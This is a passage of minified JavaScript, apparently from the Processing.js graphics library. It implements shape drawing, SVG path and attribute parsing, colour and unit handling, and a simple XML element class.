d8=0,d7=this.children.length;d8<d7;d8++){this.children[d8].enableStyle()}},getFamily:function(){return this.family},getWidth:function(){return this.width},getHeight:function(){return this.height},setName:function(d7){this.name=d7},getName:function(){return this.name},draw:function(){if(this.visible){this.pre();this.drawImpl();this.post()}},drawImpl:function(){if(this.family===0){this.drawGroup()}else{if(this.family===1){this.drawPrimitive()}else{if(this.family===3){this.drawGeometry()}else{if(this.family===21){this.drawPath()}}}}},drawPath:function(){var d9,d8;if(this.vertices.length===0){return}cV.beginShape();if(this.vertexCodes.length===0){if(this.vertices[0].length===2){for(d9=0,d8=this.vertices.length;d9<d8;d9++){cV.vertex(this.vertices[d9][0],this.vertices[d9][1])}}else{for(d9=0,d8=this.vertices.length;d9<d8;d9++){cV.vertex(this.vertices[d9][0],this.vertices[d9][1],this.vertices[d9][2])}}}else{var d7=0;if(this.vertices[0].length===2){for(d9=0,d8=this.vertexCodes.length;d9<d8;d9++){if(this.vertexCodes[d9]===0){cV.vertex(this.vertices[d7][0],this.vertices[d7][1]);if(this.vertices[d7]["moveTo"]===true){a7[a7.length-1]["moveTo"]=true}else{if(this.vertices[d7]["moveTo"]===false){a7[a7.length-1]["moveTo"]=false}}cV.breakShape=false;d7++}else{if(this.vertexCodes[d9]===1){cV.bezierVertex(this.vertices[d7+0][0],this.vertices[d7+0][1],this.vertices[d7+1][0],this.vertices[d7+1][1],this.vertices[d7+2][0],this.vertices[d7+2][1]);d7+=3}else{if(this.vertexCodes[d9]===2){cV.curveVertex(this.vertices[d7][0],this.vertices[d7][1]);d7++}else{if(this.vertexCodes[d9]===3){cV.breakShape=true}}}}}}else{for(d9=0,d8=this.vertexCodes.length;d9<d8;d9++){if(this.vertexCodes[d9]===0){cV.vertex(this.vertices[d7][0],this.vertices[d7][1],this.vertices[d7][2]);if(this.vertices[d7]["moveTo"]===true){a7[a7.length-1]["moveTo"]=true}else{if(this.vertices[d7]["moveTo"]===false){a7[a7.length-1]["moveTo"]=false}}cV.breakShape=false}else{if(this.vertexCodes[d9]===1){cV.bezierVertex(this.vertices[d7+0][0],this.vertices[d7+0][1],this.vertices[d7+0][2],this.vertices[d7+1][0],this.vertices[d7+1][1],this.vertices[d7+1][2],this.vertices[d7+2][0],this.vertices[d7+2][1],this.vertices[d7+2][2]);d7+=3}else{if(this.vertexCodes[d9]===2){cV.curveVertex(this.vertices[d7][0],this.vertices[d7][1],this.vertices[d7][2]);d7++}else{if(this.vertexCodes[d9]===3){cV.breakShape=true}}}}}}}cV.endShape(this.close?2:1)},drawGeometry:function(){var d9,d8;cV.beginShape(this.kind);if(this.style){for(d9=0,d8=this.vertices.length;d9<d8;d9++){cV.vertex(this.vertices[d9])}}else{for(d9=0,d8=this.vertices.length;d9<d8;d9++){var d7=this.vertices[d9];if(d7[2]===0){cV.vertex(d7[0],d7[1])}else{cV.vertex(d7[0],d7[1],d7[2])}}}cV.endShape()},drawGroup:function(){for(var d8=0,d7=this.children.length;d8<d7;d8++){this.children[d8].draw()}},drawPrimitive:function(){if(this.kind===2){cV.point(this.params[0],this.params[1])}else{if(this.kind===4){if(this.params.length===4){cV.line(this.params[0],this.params[1],this.params[2],this.params[3])}else{cV.line(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5])}}else{if(this.kind===8){cV.triangle(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5])}else{if(this.kind===16){cV.quad(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5],this.params[6],this.params[7])}else{if(this.kind===30){if(this.image!==null){cV.imageMode(0);cV.image(this.image,this.params[0],this.params[1],this.params[2],this.params[3])}else{cV.rectMode(0);cV.rect(this.params[0],this.params[1],this.params[2],this.params[3])}}else{if(this.kind===31){cV.ellipseMode(0);cV.ellipse(this.params[0],this.params[1],this.params[2],this.params[3])}else{if(this.kind===32){cV.ellipseMode(0);cV.arc(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5])}else{if(this.kind===41){if(this.params.length===1){cV.box(this.params[0])}else{cV.box(this.params[0],this.params[1],this.params[2])}}else{if(this.kind===40){cV.sphere(this.params[0])}}}}}}}}}},pre:function(){if(this.matrix){cV.pushMatrix();d4.transform(this.matrix.elements[0],this.matrix.elements[3],this.matrix.elements[1],this.matrix.elements[4],this.matrix.elements[2],this.matrix.elements[5])}if(this.style){cV.pushStyle();this.styles()}},post:function(){if(this.matrix){cV.popMatrix()}if(this.style){cV.popStyle()}},styles:function(){if(this.stroke){cV.stroke(this.strokeColor);cV.strokeWeight(this.strokeWeight);cV.strokeCap(this.strokeCap);cV.strokeJoin(this.strokeJoin)}else{cV.noStroke()}if(this.fill){cV.fill(this.fillColor)}else{cV.noFill()}},getChild:function(ea){var d8,d7;if(typeof ea==="number"){return this.children[ea]}var d9;if(ea===""||this.name===ea){return this}if(this.nameTable.length>0){for(d8=0,d7=this.nameTable.length;d8<d7||d9;d8++){if(this.nameTable[d8].getName===ea){d9=this.nameTable[d8];break}}if(d9){return d9}}for(d8=0,d7=this.children.length;d8<d7;d8++){d9=this.children[d8].getChild(ea);if(d9){return d9}}return null},getChildCount:function(){return this.children.length},addChild:function(d7){this.children.push(d7);d7.parent=this;if(d7.getName()!==null){this.addName(d7.getName(),d7)}},addName:function(d8,d7){if(this.parent!==null){this.parent.addName(d8,d7)}else{this.nameTable.push([d8,d7])}},translate:function(){if(arguments.length===2){this.checkMatrix(2);this.matrix.translate(arguments[0],arguments[1])}else{this.checkMatrix(3);this.matrix.translate(arguments[0],arguments[1],0)}},checkMatrix:function(d7){if(this.matrix===null){if(d7===2){this.matrix=new cV.PMatrix2D}else{this.matrix=new cV.PMatrix3D}}else{if(d7===3&&this.matrix instanceof cV.PMatrix2D){this.matrix=new cV.PMatrix3D}}},rotateX:function(d7){this.rotate(d7,1,0,0)},rotateY:function(d7){this.rotate(d7,0,1,0)},rotateZ:function(d7){this.rotate(d7,0,0,1)},rotate:function(){if(arguments.length===1){this.checkMatrix(2);this.matrix.rotate(arguments[0])}else{this.checkMatrix(3);this.matrix.rotate(arguments[0],arguments[1],arguments[2],arguments[3])}},scale:function(){if(arguments.length===2){this.checkMatrix(2);this.matrix.scale(arguments[0],arguments[1])}else{if(arguments.length===3){this.checkMatrix(2);this.matrix.scale(arguments[0],arguments[1],arguments[2])}else{this.checkMatrix(2);this.matrix.scale(arguments[0])}}},resetMatrix:function(){this.checkMatrix(2);this.matrix.reset()},applyMatrix:function(d7){if(arguments.length===1){this.applyMatrix(d7.elements[0],d7.elements[1],0,d7.elements[2],d7.elements[3],d7.elements[4],0,d7.elements[5],0,0,1,0,0,0,0,1)}else{if(arguments.length===6){this.checkMatrix(2);this.matrix.apply(arguments[0],arguments[1],arguments[2],0,arguments[3],arguments[4],arguments[5],0,0,0,1,0,0,0,0,1)}else{if(arguments.length===16){this.checkMatrix(3);this.matrix.apply(arguments[0],arguments[1],arguments[2],arguments[3],arguments[4],arguments[5],arguments[6],arguments[7],arguments[8],arguments[9],arguments[10],arguments[11],arguments[12],arguments[13],arguments[14],arguments[15])}}}}};var cq=cV.PShapeSVG=function(){cV.PShape.call(this);if(arguments.length===1){this.element=arguments[0];this.vertexCodes=[];this.vertices=[];this.opacity=1;this.stroke=false;this.strokeColor=4278190080;this.strokeWeight=1;this.strokeCap="butt";this.strokeJoin="miter";this.strokeGradient=null;this.strokeGradientPaint=null;this.strokeName=null;this.strokeOpacity=1;this.fill=true;this.fillColor=4278190080;this.fillGradient=null;this.fillGradientPaint=null;this.fillName=null;this.fillOpacity=1;if(this.element.getName()!=="svg"){throw"root is not <svg>, it's <"+this.element.getName()+">"}}else{if(arguments.length===2){if(typeof arguments[1]==="string"){if(arguments[1].indexOf(".svg")>-1){this.element=new cV.XMLElement(null,arguments[1]);this.vertexCodes=[];this.vertices=[];this.opacity=1;this.stroke=false;this.strokeColor=4278190080;this.strokeWeight=1;this.strokeCap="butt";this.strokeJoin="miter";this.strokeGradient="";this.strokeGradientPaint="";this.strokeName="";this.strokeOpacity=1;this.fill=true;this.fillColor=4278190080;this.fillGradient=null;this.fillGradientPaint=null;this.fillOpacity=1}}else{if(arguments[0]){this.element=arguments[1];this.vertexCodes=arguments[0].vertexCodes.slice();this.vertices=arguments[0].vertices.slice();this.stroke=arguments[0].stroke;this.strokeColor=arguments[0].strokeColor;this.strokeWeight=arguments[0].strokeWeight;this.strokeCap=arguments[0].strokeCap;this.strokeJoin=arguments[0].strokeJoin;this.strokeGradient=arguments[0].strokeGradient;this.strokeGradientPaint=arguments[0].strokeGradientPaint;this.strokeName=arguments[0].strokeName;this.fill=arguments[0].fill;this.fillColor=arguments[0].fillColor;this.fillGradient=arguments[0].fillGradient;this.fillGradientPaint=arguments[0].fillGradientPaint;this.fillName=arguments[0].fillName;this.strokeOpacity=arguments[0].strokeOpacity;this.fillOpacity=arguments[0].fillOpacity;this.opacity=arguments[0].opacity}}}}this.name=this.element.getStringAttribute("id");var d7=this.element.getStringAttribute("display","inline");this.visible=d7!=="none";var ec=this.element.getAttribute("transform");if(ec){this.matrix=this.parseMatrix(ec)}var d9=this.element.getStringAttribute("viewBox");if(d9!==null){var eb=d9.split(" ");this.width=eb[2];this.height=eb[3]}var d8=this.element.getStringAttribute("width");var ea=this.element.getStringAttribute("height");if(d8!==null){this.width=this.parseUnitSize(d8);this.height=this.parseUnitSize(ea)}else{if(this.width===0||this.height===0){this.width=1;this.height=1;throw"The width and/or height is not readable in the <svg> tag of this file."}}this.parseColors(this.element);this.parseChildren(this.element)};cq.prototype=new M;cq.prototype.parseMatrix=function(){function d7(d9){var d8=[];d9.replace(/\((.*?)\)/,function(){return function(ea,eb){d8=eb.replace(/,+/g," ").split(/\s+/)}}());return d8}return function(ef){this.checkMatrix(2);var d8=[];ef.replace(/\s*(\w+)\((.*?)\)/g,function(ei){d8.push(cV.trim(ei))});if(d8.length===0){return null}for(var ed=0,eb=d8.length;ed<eb;ed++){var d9=d7(d8[ed]);if(d8[ed].indexOf("matrix")!==-1){this.matrix.set(d9[0],d9[2],d9[4],d9[1],d9[3],d9[5])}else{if(d8[ed].indexOf("translate")!==-1){var ee=d9[0];var ec=d9.length===2?d9[1]:0;this.matrix.translate(ee,ec)}else{if(d8[ed].indexOf("scale")!==-1){var eh=d9[0];var eg=d9.length===2?d9[1]:d9[0];this.matrix.scale(eh,eg)}else{if(d8[ed].indexOf("rotate")!==-1){var ea=d9[0];if(d9.length===1){this.matrix.rotate(cV.radians(ea))}else{if(d9.length===3){this.matrix.translate(d9[1],d9[2]);this.matrix.rotate(cV.radians(d9[0]));this.matrix.translate(-d9[1],-d9[2])}}}else{if(d8[ed].indexOf("skewX")!==-1){this.matrix.skewX(parseFloat(d9[0]))}else{if(d8[ed].indexOf("skewY")!==-1){this.matrix.skewY(d9[0])}}}}}}}return this.matrix}}();cq.prototype.parseChildren=function(ec){var d8=ec.getChildren();var eb=new cV.PShape;for(var ea=0,d9=d8.length;ea<d9;ea++){var d7=this.parseChild(d8[ea]);if(d7){eb.addChild(d7)}}this.children.push(eb)};cq.prototype.getName=function(){return this.name};cq.prototype.parseChild=function(d9){var d8=d9.getName();var d7;if(d8==="g"){d7=new cq(this,d9)}else{if(d8==="defs"){d7=new cq(this,d9)}else{if(d8==="line"){d7=new cq(this,d9);d7.parseLine()}else{if(d8==="circle"){d7=new cq(this,d9);d7.parseEllipse(true)}else{if(d8==="ellipse"){d7=new cq(this,d9);d7.parseEllipse(false)}else{if(d8==="rect"){d7=new cq(this,d9);d7.parseRect()}else{if(d8==="polygon"){d7=new cq(this,d9);d7.parsePoly(true)}else{if(d8==="polyline"){d7=new cq(this,d9);d7.parsePoly(false)}else{if(d8==="path"){d7=new cq(this,d9);d7.parsePath()}else{if(d8==="radialGradient"){dt("PShapeSVG.prototype.parseChild, name = radialGradient")}else{if(d8==="linearGradient"){dt("PShapeSVG.prototype.parseChild, name = linearGradient")}else{if(d8==="text"){dt("PShapeSVG.prototype.parseChild, name = text")}else{if(d8==="filter"){dt("PShapeSVG.prototype.parseChild, name = filter")}else{if(d8==="mask"){dt("PShapeSVG.prototype.parseChild, name = mask")}else{E()}}}}}}}}}}}}}}return d7};cq.prototype.parsePath=function(){this.family=21;this.kind=0;var ec=[];var ew;var ev=cV.trim(this.element.getStringAttribute("d").replace(/[\s,]+/g," "));if(ev===null){return}ev=cV.__toCharArray(ev);var ea=0,d9=0,eh=0,ef=0,eg=0,ee=0,en=0,em=0,d8=0,d7=0,ej=0,ei=0,el=0,ek=0,eu=0,eq=0;var eo="";var es=[];var et=false;var ed;var eb;var er,ep;while(eu<ev.length){eq=ev[eu].valueOf();if(eq>=65&&eq<=90||eq>=97&&eq<=122){er=eu;eu++;if(eu<ev.length){es=[];eq=ev[eu].valueOf();while(!(eq>=65&&eq<=90||eq>=97&&eq<=100||eq>=102&&eq<=122)&&et===false){if(eq===32){if(eo!==""){es.push(parseFloat(eo));eo=""}eu++}else{if(eq===45){if(ev[eu-1].valueOf()===101){eo+=ev[eu].toString();eu++}else{if(eo!==""){es.push(parseFloat(eo))}eo=ev[eu].toString();eu++}}else{eo+=ev[eu].toString();eu++}}if(eu===ev.length){et=true}else{eq=ev[eu].valueOf()}}}if(eo!==""){es.push(parseFloat(eo));eo=""}eb=ev[er];eq=eb.valueOf();if(eq===77){if(es.length>=2&&es.length%2===0){ea=es[0];d9=es[1];this.parsePathMoveto(ea,d9);if(es.length>2){for(er=2,ep=es.length;er<ep;er+=2){ea=es[er];d9=es[er+1];this.parsePathLineto(ea,d9)}}}}else{if(eq===109){if(es.length>=2&&es.length%2===0){ea+=es[0];d9+=es[1];this.parsePathMoveto(ea,d9);if(es.length>2){for(er=2,ep=es.length;er<ep;er+=2){ea+=es[er];d9+=es[er+1];this.parsePathLineto(ea,d9)}}}}else{if(eq===76){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){ea=es[er];d9=es[er+1];this.parsePathLineto(ea,d9)}}}else{if(eq===108){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){ea+=es[er];d9+=es[er+1];this.parsePathLineto(ea,d9)}}}else{if(eq===72){for(er=0,ep=es.length;er<ep;er++){ea=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===104){for(er=0,ep=es.length;er<ep;er++){ea+=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===86){for(er=0,ep=es.length;er<ep;er++){d9=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===118){for(er=0,ep=es.length;er<ep;er++){d9+=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===67){if(es.length>=6&&es.length%6===0){for(er=0,ep=es.length;er<ep;er+=6){eg=es[er];en=es[er+1];ee=es[er+2];em=es[er+3];d8=es[er+4];d7=es[er+5];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===99){if(es.length>=6&&es.length%6===0){for(er=0,ep=es.length;er<ep;er+=6){eg=ea+es[er];en=d9+es[er+1];ee=ea+es[er+2];em=d9+es[er+3];d8=ea+es[er+4];d7=d9+es[er+5];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===83){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){if(ed.toLowerCase()==="c"||ed.toLowerCase()==="s"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eg=el+(el-ej);en=ek+(ek-ei)}else{eg=this.vertices[this.vertices.length-1][0];en=this.vertices[this.vertices.length-1][1]}ee=es[er];em=es[er+1];d8=es[er+2];d7=es[er+3];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===115){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){if(ed.toLowerCase()==="c"||ed.toLowerCase()==="s"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eg=el+(el-ej);en=ek+(ek-ei)}else{eg=this.vertices[this.vertices.length-1][0];en=this.vertices[this.vertices.length-1][1]}ee=ea+es[er];em=d9+es[er+1];d8=ea+es[er+2];d7=d9+es[er+3];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===81){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){eh=es[er];ef=es[er+1];d8=es[er+2];d7=es[er+3];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===113){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){eh=ea+es[er];ef=d9+es[er+1];d8=ea+es[er+2];d7=d9+es[er+3];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===84){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){if(ed.toLowerCase()==="q"||ed.toLowerCase()==="t"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eh=el+(el-ej);ef=ek+(ek-ei)}else{eh=ea;ef=d9}d8=es[er];d7=es[er+1];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===116){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){if(ed.toLowerCase()==="q"||ed.toLowerCase()==="t"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eh=el+(el-ej);ef=ek+(ek-ei)}else{eh=ea;ef=d9}d8=ea+es[er];d7=d9+es[er+1];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===90||eq===122){this.close=true}}}}}}}}}}}}}}}}}ed=eb.toString()}else{eu++}}};cq.prototype.parsePathQuadto=function(d9,eb,d7,ec,d8,ea){if(this.vertices.length>0){this.parsePathCode(1);this.parsePathVertex(d9+(d7-d9)*2/3,eb+(ec-eb)*2/3);this.parsePathVertex(d8+(d7-d8)*2/3,ea+(ec-ea)*2/3);this.parsePathVertex(d8,ea)}else{throw"Path must start with M/m"}};cq.prototype.parsePathCurveto=function(ea,ec,d8,eb,d7,d9){if(this.vertices.length>0){this.parsePathCode(1);this.parsePathVertex(ea,ec);this.parsePathVertex(d8,eb);this.parsePathVertex(d7,d9)}else{throw"Path must start with M/m"}};cq.prototype.parsePathLineto=function(d8,d7){if(this.vertices.length>0){this.parsePathCode(0);this.parsePathVertex(d8,d7);this.vertices[this.vertices.length-1]["moveTo"]=false}else{throw"Path must start with M/m"}};cq.prototype.parsePathMoveto=function(d8,d7){if(this.vertices.length>0){this.parsePathCode(3)}this.parsePathCode(0);this.parsePathVertex(d8,d7);this.vertices[this.vertices.length-1]["moveTo"]=true};cq.prototype.parsePathVertex=function(d7,d9){var d8=[];d8[0]=d7;d8[1]=d9;this.vertices.push(d8)};cq.prototype.parsePathCode=function(d7){this.vertexCodes.push(d7)};cq.prototype.parsePoly=function(eb){this.family=21;this.close=eb;var d8=cV.trim(this.element.getStringAttribute("points").replace(/[,\s]+/g," "));if(d8!==null){var d7=d8.split(" ");if(d7.length%2===0){for(var ea=0,d9=d7.length;ea<d9;ea++){var ec=[];ec[0]=d7[ea];ec[1]=d7[++ea];this.vertices.push(ec)}}else{throw"Error parsing polygon points: odd number of coordinates provided"}}};cq.prototype.parseRect=function(){this.kind=30;this.family=1;this.params=[];this.params[0]=this.element.getFloatAttribute("x");this.params[1]=this.element.getFloatAttribute("y");this.params[2]=this.element.getFloatAttribute("width");this.params[3]=this.element.getFloatAttribute("height");if(this.params[2]<0||this.params[3]<0){throw"svg error: negative width or height found while parsing <rect>"}};cq.prototype.parseEllipse=function(d9){this.kind=31;this.family=1;this.params=[];this.params[0]=this.element.getFloatAttribute("cx")|0;this.params[1]=this.element.getFloatAttribute("cy")|0;var d8,d7;if(d9){d8=d7=this.element.getFloatAttribute("r");if(d8<0){throw"svg error: negative radius found while parsing <circle>"}}else{d8=this.element.getFloatAttribute("rx");d7=this.element.getFloatAttribute("ry");if(d8<0||d7<0){throw"svg error: negative x-axis radius or y-axis radius found while parsing <ellipse>"}}this.params[0]-=d8;this.params[1]-=d7;this.params[2]=d8*2;this.params[3]=d7*2};cq.prototype.parseLine=function(){this.kind=4;this.family=1;this.params=[];this.params[0]=this.element.getFloatAttribute("x1");this.params[1]=this.element.getFloatAttribute("y1");this.params[2]=this.element.getFloatAttribute("x2");this.params[3]=this.element.getFloatAttribute("y2")};cq.prototype.parseColors=function(d9){if(d9.hasAttribute("opacity")){this.setOpacity(d9.getAttribute("opacity"))}if(d9.hasAttribute("stroke")){this.setStroke(d9.getAttribute("stroke"))}if(d9.hasAttribute("stroke-width")){this.setStrokeWeight(d9.getAttribute("stroke-width"))}if(d9.hasAttribute("stroke-linejoin")){this.setStrokeJoin(d9.getAttribute("stroke-linejoin"))}if(d9.hasAttribute("stroke-linecap")){this.setStrokeCap(d9.getStringAttribute("stroke-linecap"))}if(d9.hasAttribute("fill")){this.setFill(d9.getStringAttribute("fill"))}if(d9.hasAttribute("style")){var ec=d9.getStringAttribute("style");var ea=ec.toString().split(";");for(var d8=0,d7=ea.length;d8<d7;d8++){var eb=cV.trim(ea[d8].split(":"));if(eb[0]==="fill"){this.setFill(eb[1])}else{if(eb[0]==="fill-opacity"){this.setFillOpacity(eb[1])}else{if(eb[0]==="stroke"){this.setStroke(eb[1])}else{if(eb[0]==="stroke-width"){this.setStrokeWeight(eb[1])}else{if(eb[0]==="stroke-linecap"){this.setStrokeCap(eb[1])}else{if(eb[0]==="stroke-linejoin"){this.setStrokeJoin(eb[1])}else{if(eb[0]==="stroke-opacity"){this.setStrokeOpacity(eb[1])}else{if(eb[0]==="opacity"){this.setOpacity(eb[1])}}}}}}}}}}};cq.prototype.setFillOpacity=function(d7){this.fillOpacity=parseFloat(d7);this.fillColor=this.fillOpacity*255<<24|this.fillColor&16777215};cq.prototype.setFill=function(d7){var d8=this.fillColor&4278190080;if(d7==="none"){this.fill=false}else{if(d7.indexOf("#")===0){this.fill=true;if(d7.length===4){d7=d7.replace(/#(.)(.)(.)/,"#$1$1$2$2$3$3")}this.fillColor=d8|parseInt(d7.substring(1),16)&16777215}else{if(d7.indexOf("rgb")===0){this.fill=true;this.fillColor=d8|this.parseRGB(d7)}else{if(d7.indexOf("url(#")===0){this.fillName=d7.substring(5,d7.length-1)}else{if(C[d7]){this.fill=true;this.fillColor=d8|parseInt(C[d7].substring(1),16)&16777215}}}}}};cq.prototype.setOpacity=function(d7){this.strokeColor=parseFloat(d7)*255<<24|this.strokeColor&16777215;this.fillColor=parseFloat(d7)*255<<24|this.fillColor&16777215};cq.prototype.setStroke=function(d7){var d8=this.strokeColor&4278190080;if(d7==="none"){this.stroke=false}else{if(d7.charAt(0)==="#"){this.stroke=true;if(d7.length===4){d7=d7.replace(/#(.)(.)(.)/,"#$1$1$2$2$3$3")}this.strokeColor=d8|parseInt(d7.substring(1),16)&16777215}else{if(d7.indexOf("rgb")===0){this.stroke=true;this.strokeColor=d8|this.parseRGB(d7)}else{if(d7.indexOf("url(#")===0){this.strokeName=d7.substring(5,d7.length-1)}else{if(C[d7]){this.stroke=true;this.strokeColor=d8|parseInt(C[d7].substring(1),16)&16777215}}}}}};cq.prototype.setStrokeWeight=function(d7){this.strokeWeight=this.parseUnitSize(d7)};cq.prototype.setStrokeJoin=function(d7){if(d7==="miter"){this.strokeJoin="miter"}else{if(d7==="round"){this.strokeJoin="round"}else{if(d7==="bevel"){this.strokeJoin="bevel"}}}};cq.prototype.setStrokeCap=function(d7){if(d7==="butt"){this.strokeCap="butt"}else{if(d7==="round"){this.strokeCap="round"}else{if(d7==="square"){this.strokeCap="square"}}}};cq.prototype.setStrokeOpacity=function(d7){this.strokeOpacity=parseFloat(d7);this.strokeColor=this.strokeOpacity*255<<24|this.strokeColor&16777215};cq.prototype.parseRGB=function(d8){var d9=d8.substring(d8.indexOf("(")+1,d8.indexOf(")"));var d7=d9.split(", ");return d7[0]<<16|d7[1]<<8|d7[2]};cq.prototype.parseUnitSize=function(d8){var d7=d8.length-2;if(d7<0){return d8}if(d8.indexOf("pt")===d7){return parseFloat(d8.substring(0,d7))*1.25}if(d8.indexOf("pc")===d7){return parseFloat(d8.substring(0,d7))*15}if(d8.indexOf("mm")===d7){return parseFloat(d8.substring(0,d7))*3.543307}if(d8.indexOf("cm")===d7){return parseFloat(d8.substring(0,d7))*35.43307}if(d8.indexOf("in")===d7){return parseFloat(d8.substring(0,d7))*90}if(d8.indexOf("px")===d7){return parseFloat(d8.substring(0,d7))}return parseFloat(d8)};cV.shape=function(d9,d8,eb,ea,d7){if(arguments.length>=1&&arguments[0]!==null){if(d9.isVisible()){cV.pushMatrix();if(Q===3){if(arguments.length===5){cV.translate(d8-ea/2,eb-d7/2);cV.scale(ea/d9.getWidth(),d7/d9.getHeight())}else{if(arguments.length===3){cV.translate(d8-d9.getWidth()/2,-d9.getHeight()/2)}else{cV.translate(-d9.getWidth()/2,-d9.getHeight()/2)}}}else{if(Q===0){if(arguments.length===5){cV.translate(d8,eb);cV.scale(ea/d9.getWidth(),d7/d9.getHeight())}else{if(arguments.length===3){cV.translate(d8,eb)}}}else{if(Q===1){if(arguments.length===5){ea-=d8;d7-=eb;cV.translate(d8,eb);cV.scale(ea/d9.getWidth(),d7/d9.getHeight())}else{if(arguments.length===3){cV.translate(d8,eb)}}}}}d9.draw();if(arguments.length===1&&Q===3||arguments.length>1){cV.popMatrix()}}}};cV.shapeMode=function(d7){Q=d7};cV.loadShape=function(d7){if(arguments.length===1){if(d7.indexOf(".svg")>-1){return new cq(null,d7)}}return null};var cS=function(eb,ea,d7,d8,d9){this.fullName=eb||"";this.name=ea||"";this.namespace=d7||"";this.value=d8;this.type=d9};cS.prototype={getName:function(){return this.name},getFullName:function(){return this.fullName},getNamespace:function(){return this.namespace},getValue:function(){return this.value},getType:function(){return this.type},setValue:function(d7){this.value=d7}};var b8=cV.XMLElement=function(){this.attributes=[];this.children=[];this.fullName=null;this.name=null;this.namespace="";this.content=null;this.parent=null;this.lineNr="";this.systemID="";this.type="ELEMENT";if(arguments.length===4){this.fullName=arguments[0]||"";if(arguments[1]){this.name=arguments[1]}else{var d7=this.fullName.indexOf(":");if(d7>=0){this.name=this.fullName.substring(d7+1)}else{this.name=this.fullName}}this.namespace=arguments[1];this.lineNr=arguments[3];this.systemID=arguments[2]}else{if(arguments.length===2&&arguments[1].indexOf(".")>-1){this.parse(arguments[arguments.length-1])}else{if(arguments.length===1&&typeof arguments[0]==="string"){this.parse(arguments[0])}}}};b8.prototype={parse:function(d7){var d9;try{var eb=d7.substring(d7.length-4);if(eb===".xml"||eb===".svg"){d7=u(d7)}d9=(new DOMParser).parseFromString(d7,"text/xml");var d8=d9.documentElement;if(d8){this.parseChildrenRecursive(null,d8)}else{throw"Error loading document"}return this}catch(ea){throw ea}},parseChildrenRecursive:function(ef,ed){var ec,d8,ee,eb,ea,d7;if(!ef){this.fullName=ed.localName;this.name=ed.nodeName;ec=this}else{ec=new b8(ed.localName,ed.nodeName,"","");ec.parent=ef}if(ed.nodeType===3&&ed.textContent!==""){return this.createPCDataElement(ed.textContent)}for(eb=0,ea=ed.attributes.length;eb<ea;eb++){ee=ed.attributes[eb];d8=new cS(ee.getname,ee.nodeName,ee.namespaceURI,ee.nodeValue,ee.nodeType);ec.attributes.push(d8)}for(eb=0,ea=ed.childNodes.length;eb<ea;eb++){var d9=ed.childNodes[eb];if(d9.nodeType===1||d9.nodeType===3){d7=ec.parseChildrenRecursive(ec,d9);if(d7!==null){ec.children.push(d7)}}}return ec},createElement:function(){if(arguments.length===2){return new b8(arguments[0],arguments[1],null,null)}return new b8(arguments[0],arguments[1],arguments[2],arguments[3])},createPCDataElement:function(d7){if(d7.replace(/^\s+$/g,"")===""){return null}var d8=new b8;d8.content=d7;d8.type="TEXT";return d8},hasAttribute:function(){if(arguments.length===1){return this.getAttribute(arguments[0])!==null}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])!==null}},equals:function(ec){if(!(ec instanceof b8)){return false}var d9,d8;if(this.name!==ec.getLocalName()){return false}if(this.attributes.length!==ec.getAttributeCount()){return false}if(this.attributes.length!==ec.attributes.length){return false}var eg,ee,d7,ed,ef;for(d9=0,d8=this.attributes.length;d9<d8;d9++){eg=this.attributes[d9].getName();ee=this.attributes[d9].getNamespace();ef=ec.findAttribute(eg,ee);if(ef===null){return false}if(this.attributes[d9].getValue()!==ef.getValue()){return false}if(this.attributes[d9].getType()!==ef.getType()){return false}}if(this.children.length!==ec.getChildCount()){return false}if(this.children.length>0){var eb,ea;for(d9=0,d8=this.children.length;d9<d8;d9++){eb=this.getChild(d9);ea=ec.getChild(d9);if(!eb.equals(ea)){return false}}return true}return this.content===ec.content},getContent:function(){if(this.type==="TEXT"){return this.content}var d7=this.children;if(d7.length===1&&d7[0].type==="TEXT"){return d7[0].content}return null},getAttribute:function(){var d7;if(arguments.length===2){d7=this.findAttribute(arguments[0]);if(d7){return d7.getValue()}return arguments[1]}else{if(arguments.length===1){d7=this.findAttribute(arguments[0]);if(d7){return d7.getValue()}return null}else{if(arguments.length===3){d7=this.findAttribute(arguments[0],arguments[1]);if(d7){return d7.getValue()}return arguments[2]}}}},getStringAttribute:function(){if(arguments.length===1){return 